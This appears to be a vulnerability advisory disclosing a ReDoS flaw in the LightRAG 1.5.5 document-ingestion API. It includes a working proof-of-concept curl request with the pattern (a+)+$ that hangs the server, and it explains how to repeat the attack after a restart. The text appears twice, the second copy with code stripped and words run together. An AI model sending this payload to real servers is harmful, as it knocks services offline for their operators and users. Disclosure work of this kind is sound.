Summary
A user-supplied regular expression in the chunking parameters of POST /documents/text is
compiled and run against user-supplied text without any complexity limit or timeout. A request
carrying a catastrophically backtracking pattern (e.g. (a+)+$) pins a CPU core indefinitely.
The server stops answering requests and does not recover without a restart. Tested on 1.5.5.
Details
SemanticVectorChunkParams.sentence_split_regex accepts an arbitrary string. Its validator only
checks that the pattern compiles — lightrag/api/routers/document_routes.py:526-541:
@field_validator("sentence_split_regex")
@classmethod
def _valid_sentence_split_regex(cls, v: Optional[str]) -> Optional[str]:
if v is None:
return v
try:
re.compile(v)
except re.error as exc:
raise ValueError(...)
return v
re.compile() validates syntax, not complexity. (a+)+$ is syntactically valid and passes.
The pattern is then applied to the document body in lightrag/chunker/semantic_vector.py:136:
single_sentences_list = re.split(splitter.sentence_split_regex, text)
reached from semantic_vector.py:284:
pieces = await asyncio.to_thread(_semantic_groups_with_spans, splitter, content)
There is no timeout anywhere on this path. (a+)+ is ambiguous — a run of n a characters can be
partitioned 2^(n-1) ways — and the trailing ! forces the engine to reject every one before it can
fail. Measured with stdlib re: 24 chars 0.70s, 26 chars 2.77s, 28 chars 11.2s, i.e. 2x per added
character. 40 characters does not finish.
re.split runs in C and holds the GIL, so the call cannot be interrupted and asyncio cannot
cancel it.
Both halves of the attack come from the same request body: chunking.params.sentence_split_regex
supplies the pattern, text supplies the subject.
PoC
Tested against 1.5.5 built from source. Default configuration — no special storage backend or
chunker setting required. The LLM/embedding backends do not need to work; the regex runs before
they are called.
Start the server:
docker build -t lightrag-test .
docker run -d --name lightrag-test --cpus=1 -p 9621:9621 \
-e LLM_BINDING=ollama -e LLM_BINDING_HOST=http://127.0.0.1:1 -e LLM_MODEL=dummy \
-e EMBEDDING_BINDING=ollama -e EMBEDDING_BINDING_HOST=http://127.0.0.1:1 -e EMBEDDING_MODEL=dummy \
lightrag-test
Send the request (41-byte text, 7-character regex):
curl -X POST http://127.0.0.1:9621/documents/text \
-H 'Content-Type: application/json' \
-d '{"text":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!",
"file_source":"attack.txt",
"chunking":{"strategy":"semantic_vector",
"params":{"sentence_split_regex":"(a+)+$"}}}'
Returns 200:
{"status":"success","message":"Text successfully received. Processing will continue in
background.","track_id":"insert_..."}
Observe:
docker stats --no-stream lightrag-test # CPU pinned at ~100%
curl -m 20 -o /dev/null -w '%{http_code}\n' http://127.0.0.1:9621/health
/health returns 000 (no response). Measured over 5 minutes: CPU 99-100% throughout, /health
and /documents both time out, the container process stays alive. docker restart returns it to
normal in ~25s.
For a control, the same request with "sentence_split_regex":"(?<=[.?!])\\s+" completes
immediately and CPU returns to ~1%.
Note when reproducing: the document id is compute_mdhash_id(full_text, prefix="doc-")
(lightrag/lightrag.py:1711), so resubmitting the exact same text is deduplicated and does
nothing. Change the text between attempts — one extra a is enough, and also doubles the work.
Impact
ReDoS (CWE-1333) — denial of service through algorithmic complexity.
Any client that can call POST /documents/text can trigger it. That means any authenticated user
when AUTH_ACCOUNTS or LIGHTRAG_API_KEY is set, and any client at all on an instance running
without authentication.
The request is under 200 bytes, so MAX_REQUEST_BODY_BYTES and the admission-control capacity
reservation do not apply. No valid LLM or embedding credentials are needed. A single request is
enough, and it can be repeated after each restart with one character changed in the text.
POST /documents/texts takes the same chunking object and is affected identically.
Summary
A user-supplied regular expression in the chunking parameters of
POST /documents/textiscompiled and run against user-supplied text without any complexity limit or timeout. A request
carrying a catastrophically backtracking pattern (e.g.
(a+)+$) pins a CPU core indefinitely.The server stops answering requests and does not recover without a restart. Tested on 1.5.5.
Details
SemanticVectorChunkParams.sentence_split_regexaccepts an arbitrary string. Its validator onlychecks that the pattern compiles —
lightrag/api/routers/document_routes.py:526-541:re.compile()validates syntax, not complexity.(a+)+$is syntactically valid and passes.The pattern is then applied to the document body in
lightrag/chunker/semantic_vector.py:136:reached from
semantic_vector.py:284:There is no timeout anywhere on this path.
(a+)+is ambiguous — a run of nacharacters can bepartitioned 2^(n-1) ways — and the trailing
!forces the engine to reject every one before it canfail. Measured with stdlib
re: 24 chars 0.70s, 26 chars 2.77s, 28 chars 11.2s, i.e. 2x per addedcharacter. 40 characters does not finish.
re.splitruns in C and holds the GIL, so the call cannot be interrupted andasynciocannotcancel it.
Both halves of the attack come from the same request body:
chunking.params.sentence_split_regexsupplies the pattern,
textsupplies the subject.PoC
Tested against 1.5.5 built from source. Default configuration — no special storage backend or
chunker setting required. The LLM/embedding backends do not need to work; the regex runs before
they are called.
Start the server:
Send the request (41-byte text, 7-character regex):
Returns
200:Observe:
/healthreturns000(no response). Measured over 5 minutes: CPU 99-100% throughout,/healthand
/documentsboth time out, the container process stays alive.docker restartreturns it tonormal in ~25s.
For a control, the same request with
"sentence_split_regex":"(?<=[.?!])\\s+"completesimmediately and CPU returns to ~1%.
Note when reproducing: the document id is
compute_mdhash_id(full_text, prefix="doc-")(
lightrag/lightrag.py:1711), so resubmitting the exact sametextis deduplicated and doesnothing. Change the text between attempts — one extra
ais enough, and also doubles the work.Impact
ReDoS (CWE-1333) — denial of service through algorithmic complexity.
Any client that can call
POST /documents/textcan trigger it. That means any authenticated userwhen
AUTH_ACCOUNTSorLIGHTRAG_API_KEYis set, and any client at all on an instance runningwithout authentication.
The request is under 200 bytes, so
MAX_REQUEST_BODY_BYTESand the admission-control capacityreservation do not apply. No valid LLM or embedding credentials are needed. A single request is
enough, and it can be repeated after each restart with one character changed in the text.
POST /documents/textstakes the samechunkingobject and is affected identically.